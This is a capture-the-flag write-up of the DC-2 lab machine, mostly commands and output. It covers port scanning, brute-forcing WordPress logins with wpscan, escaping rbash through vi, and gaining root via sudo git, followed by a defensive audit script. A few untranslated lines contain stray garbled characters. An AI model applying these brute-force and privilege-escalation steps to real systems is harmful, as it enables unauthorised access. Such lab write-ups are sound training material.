[offensive-security] 3. DC-2 target machine
I. Gathering target information
1. Known information:
- IP: 192.168.245.193
2. Information gathered:
- nmap scan of the open services
┌──(root?0xlo0p)-[/home/lo0p]
└─# nmap -p "*" -A 192.168.245.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 19:25 CST
Nmap scan report for dc-2 (192.168.245.194)
Host is up (0.30s latency).
Not shown: 8349 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Port 80 is open, plus SSH on port 7744. We look at the web side first: visiting by IP alone does not work, the site redirects to http://dc-2, so we need to add an entry to /etc/hosts so that dc-2 resolves locally to the target.
Edit hosts:
┌──(root?0xlo0p)-[/home/lo0p]
└─# cat /etc/hosts
127.0.0.1 localhost
192.168.245.194 dc-2
After editing, restart the networking service: /etc/init.d/networking restart
The first flag hint is on the homepage:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
3. Brute-forcing WP usernames and passwords
It looks like we are meant to brute-force, but the hint also says the usual wordlists will not work. The keyword cewl stands out: this tool crawls a website and saves the words it finds as a wordlist. Usage guide: kali密碼攻擊工具——Cewl使用指南 | 碼農網 (codercto.com)
┌──(root?0xlo0p)-[/home/lo0p]
└─# cewl http://dc-2/ -w Desktop/wp2.txt # save the crawled wordlist to wp2.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
With a password wordlist in hand, we still need to know which usernames exist; time for wpscan:
┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:39:38 2022
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:40:07 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.614 KB
[+] Data Received: 514.805 KB
[+] Memory used: 207.809 MB
[+] Elapsed time: 00:00:28
Now we have a username list too. Save it to user.txt on the desktop, one per line: tom, jerry, admin.
┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -U user.txt -P wp2.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:42:16 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:03:22 <============================================================================================== > (646 / 1121) 57.62% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:45:55 2022
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 252.957 MB
[+] Elapsed time: 00:03:39
We have the passwords for tom and jerry, so let's try logging in to the admin backend. There is no login link on the web page, so we locate it by directory brute-forcing:
┌──(root?0xlo0p)-[/home/lo0p]
└─# dirsearch -u http://dc-2/ -e * -x 403 404
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/dc-2/-_22-10-26_16-51-46.txt
Error Log: /root/.dirsearch/logs/errors-22-10-26_16-51-46.log
Target: http://dc-2/
[16:51:57] Starting:
[16:53:10] 301 - 0B - /index.php -> http://dc-2/
[16:53:16] 200 - 19KB - /license.txt
[16:53:35] 200 - 7KB - /readme.html
[16:53:49] 301 - 299B - /wp-admin -> http://dc-2/wp-admin/
[16:53:50] 200 - 0B - /wp-content/
[16:53:50] 200 - 0B - /wp-config.php
[16:53:50] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[16:53:50] 200 - 1B - /wp-admin/admin-ajax.php
[16:53:50] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:53:50] 500 - 0B - /wp-content/plugins/hello.php
[16:53:50] 500 - 4KB - /wp-admin/setup-config.php
[16:53:50] 200 - 1KB - /wp-admin/install.php
[16:53:50] 301 - 301B - /wp-content -> http://dc-2/wp-content/
[16:53:50] 500 - 0B - /wp-includes/rss-functions.php
[16:53:50] 200 - 0B - /wp-cron.php
[16:53:50] 200 - 2KB - /wp-login.php
[16:53:50] 302 - 0B - /wp-signup.php -> http://dc-2/wp-login.php?action=register
[16:53:51] 301 - 302B - /wp-includes -> http://dc-2/wp-includes/
[16:53:51] 405 - 42B - /xmlrpc.php
[16:53:53] 200 - 40KB - /wp-includes/
Task Completed
Found the URI: /wp-login.php
After logging in to the backend, there is nothing of note as tom, but as jerry we find a flag hint:
If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
This tells us that none of the WordPress exploits will work here, and testing with msf confirms it. So what other entry point is there? Looking back over what we have found so far, SSH is still available. We could brute-force SSH, but first let's simply try tom's and jerry's passwords (jerry's does not work, but tom's logs in):
┌──(lo0p?0xlo0p)-[~]
└─$ ssh tom@192.168.245.194 -p 7744
tom@192.168.245.194's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 26 07:10:05 2022 from 192.168.49.245
tom@DC-2:~$ whoami
-rbash: whoami: command not found
但是只有rbash的權(quán)限憾股,能執(zhí)行的命令限制了很多鹿蜀,這個時候就需要rbash逃逸
4.rbash逃逸
具體原理:(71條消息) 【滲透測試】--- rbash逃逸方法簡述_通地塔的博客-CSDN博客
首先看下能執(zhí)行哪些命令:
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ echo /home/tom/usr/bin/*
/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi
Following the article linked above, we can use vi to launch bash:
- vi xxx # enter the vi interface
- :set shell=/bin/bash
- :shell
Once we are in bash we still cannot run other commands, because the PATH variable is not set correctly. Set it as follows:
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/bin/:/usr/bin/
tom@DC-2:~$ whoami
tom
Looking in tom's home directory, we find the flag3 hint:
tom@DC-2:~$ ls
flag3.txt local.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
The hint says to su from tom to jerry; the password is the one wpscan recovered:
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt h
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
在jerry的home目錄下發(fā)現(xiàn)了flag4提示粉渠,前面三行說廢話分冈,但是最后一行的git非常顯眼,我們需要嘗試提權(quán)霸株。
5.GIT提權(quán)
- 查找具有SUID的二進(jìn)制文件(沒找到能用的)
jerry@DC-2:~$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
- Check the current sudo privileges
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
So, as the hint suggests, git is the escalation path. We look up git on https://gtfobins.github.io/ for the sudo technique:
1. sudo git help config
2. Type !/bin/bash
Root obtained:
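As an added example (not part of the original writeup), here is a small Python audit script, written from the defender's side, that flags the two misconfigurations sections 4 and 5 rely on: shell-capable programs inside a restricted shell's allowed PATH, and sudo rules that run such programs as root, especially with NOPASSWD. The inputs are constructed from the outputs shown above; the SHELL_SPAWNERS list and the function names are this example's own assumptions.

```python
"""Audit helpers for the DC-2 findings: restricted-shell allowlist and sudo rules.
Added example, not the writeup's own code. Inputs below are constructed."""
import re

# Programs known to hand the caller an unrestricted shell or pager escape
# (vi via ':set shell', less/git help via '!cmd'). Assumed, not exhaustive.
SHELL_SPAWNERS = {"vi", "vim", "less", "more", "man", "git", "find", "awk", "python"}

# Constructed: mirrors `echo /home/tom/usr/bin/*` from the rbash section.
RBASH_PATH_LISTING = ("/home/tom/usr/bin/less /home/tom/usr/bin/ls "
                      "/home/tom/usr/bin/scp /home/tom/usr/bin/vi")

# Constructed: the `sudo -l` rule from the writeup, plus one benign rule.
SUDO_L_OUTPUT = """\
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/systemctl status apache2
"""

# One `sudo -l` command line: "(runas) [TAG: ...] /path/to/cmd [args]"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")


def risky_rbash_allowlist(listing: str) -> list:
    """Return basenames in a restricted shell's PATH that can spawn a shell."""
    names = [path.rsplit("/", 1)[-1] for path in listing.split()]
    return sorted(name for name in names if name in SHELL_SPAWNERS)


def risky_sudo_rules(sudo_l: str) -> list:
    """Parse `sudo -l` output and flag shell-spawning binaries, recording
    whether NOPASSWD lets them be run without the user's password."""
    findings = []
    for line in sudo_l.splitlines():
        match = SUDO_RULE.match(line)
        if not match:
            continue  # header lines such as "User jerry may run ..."
        binary = match.group("cmd").rsplit("/", 1)[-1]
        if binary in SHELL_SPAWNERS:
            findings.append({"runas": match.group("runas").strip(),
                             "binary": binary,
                             "nopasswd": "NOPASSWD" in match.group("tags")})
    return findings


if __name__ == "__main__":
    print("rbash allowlist can spawn a shell via:", risky_rbash_allowlist(RBASH_PATH_LISTING))
    for finding in risky_sudo_rules(SUDO_L_OUTPUT):
        print("sudo rule grants shell-capable binary:", finding)
```

On the constructed inputs it reports less and vi in the restricted PATH, and the git rule as root with NOPASSWD; the systemctl rule is not flagged.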
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt proof.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~# cat proof.txt
0d359f3e1b67060936ce02bada010328